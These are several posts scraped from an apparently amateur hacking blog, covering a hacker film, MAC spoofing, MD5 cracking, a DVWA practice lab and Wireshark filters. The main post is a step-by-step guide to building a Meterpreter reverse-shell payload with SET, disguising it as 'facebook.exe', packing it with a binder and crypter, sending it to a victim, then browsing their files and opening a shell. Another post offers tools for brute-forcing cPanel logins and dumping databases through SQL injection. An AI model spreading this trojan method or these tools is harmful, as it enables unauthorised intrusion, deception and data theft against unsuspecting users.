Pages

"Reboot" - Upcoming latest Hacker Movie you should watch

1 comments


Rosa Entertainment and Jan-Ken-Po Pictures just announced that their cyberpunk thriller short film “Reboot” will launch with a Sneak Preview at DEFCON.

Written and Directed by Joe Kawasaki, and Produced by Sidney Sherman, the film stars a bevy of hot up-and-coming actors including Emily Somers (Gabriele Muccino’s upcoming “Playing the Field”), Travis Aaron Wade (“War of the Worlds”), Martin Copping (Australian series “Neighbours”), Sonalii Castillo (“NCIS”), and Janna Bossier (Slipnot’s “Vermilion").

Set within a dystopian world that is a collision between technology and humanity, “Reboot” touches upon many of the current social and political concerns that arise from becoming more and more intertwined with the virtual. In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand and a mysterious countdown ticking away on the display. Suffering from head trauma and with little recollection of who she is or what is happening, Stat races against time to figure out what the code means and what unknown event the pending zero-hour will bring.





The recent launch of their ARG (Alternate Reality Game) has caught the attention of hackers and cyberpunk fans via Twitter. Basically, some Easter Eggs are hidden in the film trailer for viewers to find. When a player thinks they have found anything, they simply send a direct message to @reboot_film on Twitter for confirmation. As players find things they are awarded points and the Top Ten players will be awarded some cool prizes. For more ARG details, please go to: www.rebootfilm.com/scoreboard. To view the trailer: www.rebootfilm.com/trailer.







The film is the product of a successful Kickstarter campaign and has been building momentum ever since it was first announced on kickstarter.com in August of last year. Kawasaki said, "It (the film) was originally designed to simply be a great little ride, but as real world events keep developing around us (regarding issues of cyber-freedom, online privacy, security, etc.); the connotation of the film evolves and changes with it."

"Reboot" is a co-production of Sherman's production shingle, Rosa Entertainment, and Kawasaki’s Jan-Ken-Po Pictures; and the filmmakers are aiming for international film festivals like Cannes, Locarno and Toronto, as well as distribution via the internet.






Source : THN

Facebook Disconnect

1 comments



Stop Facebook from tracking the webpages you go to.
Facebook is notified whenever you visit one of the more than one million sites on the web that use Facebook Connect and has a history of leaking personally-identifiable information to third parties.

Turn off the flow of your data to them!

Facebook Disconnect blocks all traffic from third-party sites to Facebook servers but still lets you access Facebook itself.






This extension is a must-have! Along with Disconnect and Adblock. When I am setting up someone's computer with Google Chrome, I always install Disconnect, Facebook Disconnect, and Adblock, at the very least.Personally, I use Google Chrome (Beta) and I use Chrome Privacy Guard.Keep your data private folks! The tools are there to keep your browser safe, use them. There is no need to pay for good security anymore.



MAC Address Spoofing in BackTrack 5

2 comments



Today, i am going to show you how to change your system MAC address or Hardware Address or Physical Address.

First you know about MAC address.  MAC address is your system physical address which provided by Vendor means manufacture company of your system. We know that IP address is a logical address and Unique in whole world for a system, but this thing does not necessary for MAC address.

If you have IP address of any system then by use of ARP you capable find the MAC address of system and By use of RARP you capable to find out MAC address.

So all above write things is enough for know about MAC address. Now our target is how to change MAC address of system when you use BackTrack 5, so let's start.

Step1: Open your terminal window in BackTrack 5 and for see present MAC address write....

ifconfig

and press enter key, in below pic i have shown the MAC address in RED Box,see pic...





Step2: Your MAC address works on eth0 , so for change the MAC address first keep down eth0, run command...

ifconfig eth0 down


see below pic..





Step3: Now i am going to change MAC address , so change it run command...

macchanger -r eth0

when you run this command then it show you current MAC address and Faked MAC address, see below pic...




Step4: Now your MAC address spoof now again active your internet interface eth0 by run command...

ifconfig eth0 up

see below pic...





Step5: Now again check your MAC address , so for this run command "ifconfig" , see below pic..




See MAC Address in Blue Box which that FAKE MAC address.

Crack MD5 Hashes

6 comments


Today i am going to show you a tool by which you easily decrypt the MD5 Encrypted Hashes. The name of the tool is PasswordPro.



This is a Winrar file so after download extract it when u going under the PasswordPro folder,there you see a PasswordPro.exe file ,run this file.After run this open your Notepad and write your MD5 Hash Code which you want to decrypt and save it on same folder of PasswordPro or any where,see below pic...




Now go to PasswordPro Running program and click on File when you do it then a tab open where you see a option given which called "Import" , see below pic...




Now select your save Notepad copy from the saving place.


when you did it then a window of Import Users open where select type of Hash which type of hash you use and enter format is salt. see below pic...




Now go to "Audit" and select the type of attacks, "Preliminary attacks" default set but here for my hash i am select "Brute Force attacks" , see below pic..





Now go to "Start Attacks" see above pic and run it, when your process run then it look like below pic...





Wait for some time your result come after full process.

[Video Tutorial] Setup your own web hacking lab

3 comments




My Today Video tutorial based on my old post







I am made this video for viewer help whose that want to setup his own Web hacking Lab.





[Video Tutorial]How To Setup Two Factor Authentication in Backtrack Linux

0 comments


This time on the show Darren reports from SXSW 2012 with Eighty of Dual Core and Chris Mooney of DoD.net. The boys discuss two-factor authentication on the Linux platform then brainstorm and develop a tool, dubbed "Kill All The Humans", to protect your machine from unwanted invaders. Invaders must die.


PART 1




PART 2



PART 3



Hack Victim Windows OS based system by Backtrack 5

31 comments


Hello Friends, Today Hackarde completed his 201 post so i think why not celebrate this double century. So today i am going to celebrate this moment with a great post which i think you really like that. In very small time Hackarde complete his milestone and make new milestone for future.All this thing make possible with your love and hope. 

So now let's start, Today tutorial basics come from payload, so first thing which come in your mind is 
"what is payload?"

  A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt.A payload could also be something as simple as a few commands to be executed on the target operating system.

Step 1: Go to Backtrack 5 and open the terminal , i had done it with BackTrack5 R2 , so after starting terminal now write below write command ....


cd /pentest/exploits/set 

and then press enter key.Now again type..

./set

again press enter key. For live example see below pic...





Step 2: When you done step 1 then a menu will come where he say to select, then you select "Create a Payload and listener" which number in menu 4 so write 4 and press enter key, see below pic,




Step3: Again a menu will come where some name will display,here select number 2 which are "Windows Reverse TCP Meterpreter and send back to attacker", write 2 and press Enter Key, see below pic,




Step4: Now Select number 2 which means "shikata_ga_nai(very good)"  and press Enter Key, see pic,




Step5: When step 4 completed then it will ask for Default Port of the listener so enter any number . I am going to enter 808 , see below pic,




When it ask "Do you want start the listener now ?" then enter "Y"  for say yes ,see below pic,




Step6: Now, a file "msf.exe" create on the Folder. For found that file follow path..

File System>Pentest Folder>Exploits Folder>Set Folder


When you go there you see msf.exe file like below pic,




Step7: Now change this file into any other name like facebook.exe,video.exe,gmail.exe anyone which you want but remember write .exe extension of file, see below pic where i am change into facebook.exe,



Now use Binder and Crypter for this file and attach it with any other file. You can also use my old tutorial...




Because i want to only show you method so i am not bind it. Now upload this file on any free space provider website and send link to Victim, see below pic...




In my case, my victim is my friend Hemant  PC , Hemant found my send link and see a software for download then he start downloading when download finish (it takes just 5 second) then my facebook.exe file automatic execute and simultaneously my terminal window show me some lines in which want to say sessions start.

Step8: When Step 7 completed then for check sessions status run below write command...

sessions -l

when you run it then you see it showing connection...

192.168.0.13:808>>>>>>>>192.168.0.14:49793

Which means my system IP 192.168.0.13 which default Port 808 now connected with my victim Hemant System which IP is 192.168.0.14 and port 49793 . Now you enter in your victim System, see below pic,





Step9: Congrats!!!!!!!! friends you are successful with me. Now for forward process write command by which you enter in the meterpreter mode ....

sessions -i 1

And Press Enter Key see below pic... 


               


Now we want to find out system information so write.........."sysinfo" and press enter key, see above pic. where you can see...

Computer            :   HEMANT-PC
OS                       :    Windows 7

and many things. 


Step10: Now if you want to find Process list which run in the Victim System at that time then run command...

meterpreter>ps


And Press Enter Key, see below pic in which all running process show you... 




For Program List run command ................."ls"................ see below picture.....




For Get User ID run command.................."getuid".............See below pic,




For Check IP address of victim system run command................."ipconfig" ......... see below pic,




If you want to download any file from Victim system then run command...

>download c:\\windows\\system32\\sethc.exe 


And press Enter key, where  c:\\windows\\system32\\sethc.exe  is file location and name.see below pic,




For Enter in the Shell or Command Prompt of Victim IP run command...

 

meterpreter>shell

and press enter key, see below pic...



now i am enter in victim System Command Prompt, so here use all command which are you studied in past.




now in below pic i am run netuser command...







I had Spend 12 hour for make this tutorial for you,but you will spend 1 min for say thanks!


IF U THINK MY WORK G8t SO PLZ FOLLOW MY BLOG BECAUSE BY THIS YOU ENCOURAGE ME FOR WRITE MORE AMAZING TUTORIAL.





Design Your Own Web Hacking Lab On Windows

5 comments


Hello friends,today post very helpful for that person who want to do practice for make his hacking too good  . Today post help you setup your own Hacking Lab ya Your own Hacking Lab (Without any money). I think you are also interested for this because you read this post continue (i am only kidding). Total credit go to  my Friend "Shining White" who introduce me about this and i am make it too simple by add some more picture .


First Download Below Write Tool :

1. Download XAMPP


2. Download DVWA


About DVWA( Damn Vulnerable Web App)

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Includes : 

BruteForce
Command Execution 
CSRF - 
File Inclusion
SQLi
SQLi (Blind)
XSS Reflected
XSS Stored 
and more







About XAMPP

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use

Contain : distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql
I hope Most of you know about it , 






Extract XAMPP Into C:\xampp

After Extract it go to C: Drive and Open folder XAMPP where you see a folder which name "htdocs" , enter in the htdocs and Delete all Files On htdocs Folder.






Now Post the DVWA folder under htdocs folder and again go to XAMPP folder of C: Drive:





When you enter in the XAMPP folder then again search file which name "xampp_start" like below pic..




Now double click on that when you do it then a Command prompt Window open like below pic, do not do anything with that.




Now Open your any browser and type IP    "127.0.0.1" when you do it then Index open where a file present which name dvwa/ , click on that , see below pic...




When all things complete then a Login page open where it ask Username and Password so enter Username is "admin"  and

Password is "password" , see below pic...




Then a page open which say about DataBase Setup , here you see a option given in which write "Create/Reset Database" , click on that , see below pic...





Now your Lab ready for works, all options for attacks test given in left side of page , see pic..




Enjoy your own free lab , and make perfect yourself.

Sniffing Wireless Packets By BackTrack5- Part 2

2 comments


I am going to continue my old post here in which i am telling you how to apply Filter in the Wireshark.
For Read first part of this thread click on below link...




In First Post i had told you how to make Monitor Mode mon0 , Now i am start sniffing packet but a large amount of packets come here in list so how to found any selected packet , the answer of this question is Filter who help you find your packet from a large collection.

First i am telling you type of Frame. I know first thing which come in your mind is "Hey, What the f**king things is this ?"

I thought everybody know our internet is a wlan (Wide Local Area Network) , you know a wlan communicate on Frame so i thing now you know about this f**king thing.

First i am telling you about types of wlan frame , there are three types of wlan frame :

1. Control Frame : Ensuring proper communication between the access points and wireless users.

2. Management frame: Maintaining Communication between Access points and Wireless users.

3. Data frame: Carry Data between Access Point and Wireless Users .

Now i think you know about Frame Very well , i am going to start practical .

1. If you want to see only captured Management frame then Enter in filter below write code :

wlan.fc.type==0

And Press Apply button ,for example see below pic...




2. If you want to see only captured wlan control frame then type in filter box this expression :

wlan.fc.type==1

And then press Apply button , see below pic...





3. For view the Data Frame type expression which one write below....

wlan.fc.type=2


And again press Apply button , see below pic...




4. If you want see any sub-type with any frame type then write below expression :

(wlan.fc.type=0)&&(wlan.fc.subtype==8)


Change Number according to your selection , see below pic... 




5. For alternative frame selection , click on any packet of window and then follow Apply as Filter >>> Selected , look below pic ...





You can also use TCP ,POP , UDP and more as  filter.


Now i think you able to apply filter on Wireshark, in my next part i will tell you how to sniffing packets from your network.
  

Helpful Tool For Website Hacking

10 comments


Today i am given you some tool who very helpful for you in the Website Hacking, Today Winrar file collection of four tool which make your website hacking easy, so first start with intro.


Login Page Finder:

By this tool you easily found the website Admin Login Page by which after found ADMIN Name and Password you easily enter in the website Control Panel. 






Blind SQLi Dumper:


This tool use for Blind SQL Injection attack, I will tell you about Blind SQL in future post but this tool really helpful for you.





Cpanel BruteForcer :


This tool is works on the Dictionary Brute Force attacks , and also it's very helpful for me and now for you.





Exploit Scanner:


This tool tell you about Exploit link of any website by which you take profit about vulnerable page of the website , its tell you website name according to your demand.






FOR DOWNLOAD CLICK HERE


Password: www.hackarde.com

Related Posts Plugin for WordPress, Blogger...

Hackarde's Search Engine- Search Hacking Tutorial,Tool and eBook

Loading
 
HACKARDE © 2011 | Designed by HrDe